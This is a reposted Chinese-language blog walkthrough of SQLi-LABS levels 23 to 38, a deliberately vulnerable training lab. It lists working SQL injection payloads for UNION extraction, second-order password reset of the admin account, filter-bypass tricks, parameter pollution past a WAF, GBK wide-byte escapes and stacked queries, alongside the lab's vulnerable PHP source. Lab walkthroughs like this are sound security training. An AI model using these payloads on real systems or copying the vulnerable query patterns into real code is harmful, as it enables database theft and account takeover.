当前位置:网站首页>SQLi-LABS Page-2 (Adv Injections)
SQLi-LABS Page-2 (Adv Injections)
2022-08-09 23:12:00 【[email protected]】
目录
less-27-过滤空格、union、select、#、--、/*、+
less-28 -过滤空格、/*、--、#、+、union select组合
less-29-基于错误_GET_Dual server_单引号_字符型注入
less-30-基于错误_GET_Dual server_双引号_字符型注入
less-31-基于错误_GET_Dual server_双引号+Bracket injection
less-33-GET-addslashes()-单引号闭合
less-36-GET-mysql_real_escape_string()-单引号闭合
less-37-POST-mysql_real_escape_string()-单引号闭合
less-23-过滤注释
Closed single quotes,用#The content after the comment will report an error,还需要加and 'Close the back.
payload: id=-1' union select 1,database(),3 and '
关键源码:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
原来是把#和--+替换成了空.
less-24-二次注入
注册一个admin'#的用户,Then go to Change Password:
After changing the password it will change successfullyadminpassword and then log in:
关键源码:
# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
传入username=admin'#后变为:
$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'
# and password='$curr_pass' ";
This changed successfullyadmin的密码.
less-25-过滤and和or
只要不用and 和or 不就行了嘛:
id=-1' union select 1,database(),3 %23
关键源码:
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
return $id;
}
$id=$_GET['id'];
$id= blacklist($id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
正则匹配i参数:不区分大小写.
双写绕过:
id=1' aandnd 1=1 --+
符号:&& ||绕过(urlBetter to code):
id=1' %7c%7c 1=1 --+
id=1' %26%26 1=1 --+
less-26-过滤空格、and、or、#、--、/*
用%0a绕过空格,Bypass comments with closures:
id=0'%a0union%a0select%a01,database(),3'
关键源码:
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
less-27-过滤空格、union、select、#、--、/*、+
可以用大小写绕过,You can also double-write bypass:
id=0'%a0 uNion %a0 sElect %a01,database(),3'
id=0'%a0 uunionnion %a0 sElect %a0 1,database(),3'
id=0'%0a uNion %0a sElect %0a1,database(),3'
关键源码:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
selectOnly case bypass,unionCan be case and double-write bypass,Specifically look at the parameters of regular matching.
空格可以用%a0和%0a绕过.
less-28 -过滤空格、/*、--、#、+、union select组合
%0a绕过空格,uniunion%0aselecton%0aselect双写绕过union select,and('Bypass comments,也可以用%00Truncate bypass commentsphp 版本<5.3.4:
id=0') %0a uniunion%0aselecton%0aselect %0a 1,database(),3 %0a and('
id=0') %0a uniunion%0aselecton%0aselect %0a 1,database(),3;%00
也可以用union %a0 SELECT Bypass combined filtering:
id=0')%0a union %a0 select %0a 1,database(),3 %0a and('
id=0')%0a union %a0 select %0a 1,database(),3;%00
关键源码:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}
less-29-基于错误_GET_Dual server_单引号_字符型注入
服务器端有两个部分:第一部分为 tomcat 为引擎的 jsp 型服务器,第二部分为 apache 为引擎的 php 服务器,真正提供 web 服务的是 php 服务器.
apache (php) 解析最后一个参数,tomcat (jsp) 解析第一个参数.而waf是在tomcat (jsp)上面.So as long as the injection statement is written in the second parameter, it can be bypassedwaf.
id=1&id=-1' union select 1,database(),3--+
php The server can inject directly without any filtering:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
less-30-基于错误_GET_Dual server_双引号_字符型注入
id=1&id=-2" union select 1,database(),3--+
和less-29The same is just turned into double quotes to close.
less-31-基于错误_GET_Dual server_双引号+Bracket injection
id=1&id=-2") union select 1,database(),3--+
和less-30The same just closed becomes").
less-32-宽字节注入
系统会给特殊字符添加转义
Wide byte injection has strict conditions,例如PHP的编码为 UTF-8 而 MySql的编码设置为了gbk
gbk编码:Use one-byte and two-byte encodings,0x00-0x7F范围内是一位,和 ASCII 保持一致.The first byte of the double-byte range is0x81-0xFE
UTF-8编码:使用一至四字节编码,0x00–0x7F范围内是一位,和 ASCII 保持一致.其它字符用二至四个字节变长表示.
Here wide byte refers to the encoding of more than two bytes,这就导致phpcontent is enteringmysqlErrors may occur during internal transcoding,eventually form a loophole
宽字节注入原理:Analysis and summary of the principle of wide byte injection - 腾讯云开发者社区-腾讯云
id=-1%82' union select 1,database(),3 --+
关键源码:
function check_addslashes($string)
{
$string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash
$string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash
$string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash
return $string;
}
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
less-33-GET-addslashes()-单引号闭合
关键源码:
function check_addslashes($string)
{
$string= addslashes($string);
return $string;
}
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
“addslashes() 函数在指定的预定义字符前添加反斜杠.这些字符是单引号(')、双引号(")、反斜线(\)与NUL(NULL字符).”
绕过和less-32一样:
id=-1%99' union select 1,database(),3--+
less-34-POST-addslashes()
和less-33一样只是post 方式提交:
uname=-1%99' union select 1,database()--+&passwd=1&submit=Submit
注意在bp里面提交,不要在hackbar.
less-35-GET-addslashes()-整形闭合
和less-33The same is just integer closure,So there is no escaping problem,直接注入.
id=-1 union select 1,database(),3 --+
关键源码:
function check_addslashes($string)
{
$string = addslashes($string);
return $string;
}
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
print_r(mysql_error());
less-36-GET-mysql_real_escape_string()-单引号闭合
id=-1%99' union select 1,database(),3 --+
关键源码:
function check_quotes($string)
{
$string= mysql_real_escape_string($string);
return $string;
}
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
print_r(mysql_error());
mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符.
下列字符受影响:
\x00
\n
\r
\
'
"
\x1a
less-37-POST-mysql_real_escape_string()-单引号闭合
和less-36一样只是post 方式提交
uname=1%99' union select 1,database()--+&passwd=1&submit=Submit
less-38-堆叠注入
The joint query comes out directly?
id=-1' union select 1,database(),3--+
关键源码:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if (mysqli_multi_query($con1, $sql))
print_r(mysqli_error($con1));
mysqli_multi_query() 函数执行一个或多个针对数据库的查询.多个查询用分号进行分隔.
Execute multiple lines of code:
id=-1';insert into users(id,username,password)values(55,'123','312');--+
It can be seen that it has been successfully executed:
版权声明
本文为[[email protected]]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/221/202208091951459806.html
边栏推荐
- Word怎么设置图片衬于文字下方?两种方法教你设置Word图片衬于文字下方
- 【双链表增删查改接口的实现】
- [corctf 2022] section
- ACM MM 2022 | Cloud2Sketch: Painting with clouds in the sky, AI brush strokes
- hdu 1503 Advanced Fruits(最长公共子序列的应用)
- Tensorflow中placeholder函数的用法
- kvm虚拟机出现启动不了,NOT available,PV大于分区
- URL Protocol web page to open the application
- Ali Ermi: Without accept, can a TCP connection be established?
- TF使用constant生成数据
猜你喜欢
普源精电上半年扭亏为盈,高端产品持续发力!你看好仪器界“华为”吗?
Puyuan Jingdian turned losses into profits in the first half of the year, and high-end products continued to develop!Are you optimistic about "Huawei" in the instrument industry?
数独 | 回溯-7
宝塔实测-搭建LightPicture开源图床系统
编程时请选择正确的输入法,严格区分中英文
QGIS编译SIP的问题
人人都可以DIY的大玩具,宏光MINIEV GAMEBOY产品力强,出行新装备
Jmeter 使用正则表达式提取器将返回值全部保存到一个文件中
Ali Ermi: Without accept, can a TCP connection be established?
URL Protocol web page to open the application
随机推荐
编程语言中,取余和取模的区别
STC8H开发(十五): GPIO驱动Ci24R1无线模块
Word文档怎么输入无穷大符号∞
DSPE-PEG-Azide, DSPE-PEG-N3, phospholipid-polyethylene glycol-azide can react directly with DBCO
APP自动化测试框架-UiAutomator2基础入门
Don't use array.length-1 to get the last item of the array
埃氏筛选法:统计素数个数
【泛型编程】模板全详解
【云原生】4.2 DevOps 精讲篇
Wps下划线怎么弄?Wps添加下划线的最全方法
Several ways to draw timeline diagrams
STC8H development (15): GPIO drive Ci24R1 wireless module
字符串哈希(2014 SERC J题)
凸集与凸函数
STC8H开发(十五): GPIO驱动Ci24R1无线模块
10个 Istio 流量管理 最常用的例子,你知道几个?
人人都可以DIY的大玩具,宏光MINIEV GAMEBOY产品力强,出行新装备
如何让您的公司内容满足 GDPR 合规性
Definition and Basic Operations of Sequence Tables
C语言中的文件是什么?